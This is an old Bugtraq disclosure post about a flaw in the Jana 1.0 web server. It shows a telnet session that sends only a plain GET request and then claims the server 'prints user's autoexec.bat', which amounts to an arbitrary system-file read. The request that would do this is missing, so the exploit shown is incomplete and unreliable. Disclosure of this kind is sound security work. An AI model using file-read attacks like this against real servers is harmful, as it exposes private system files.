|
Bugtraq,
I have found a security flaw in Jana 1.0 webserver. I have not been able to
find out any information on who makes this product nor a place to download the
web server package. This webserver seems to be included as a suite of
Internet services, one of witch I think is web-based chat. Enclosed is one
exploit I have found in the limited time that I have had to deal with this web
server. I am posting this information now so that one of you might know who
makes this software and how I might be able to get in touch with them for
further testing.
.
[root@foo whis]# telnet x.x.x.x 80
Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 200 OK
Date: Mon, 04 Oct 1999 18:59:44 GMT Server: Jana Server/1.40 Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT Content-Length: 38 Content-Type: text/html Connection: close <HTML><BODY><CENTER>TEST</BODY></HTML>Connection
closed by foreign host.
[root@foo whis]# Prints user's autoexec.bat
I would like to say thank you to rain.forest.puppy. for all his help.
Jason Lutz
Sprint Print Inc
|
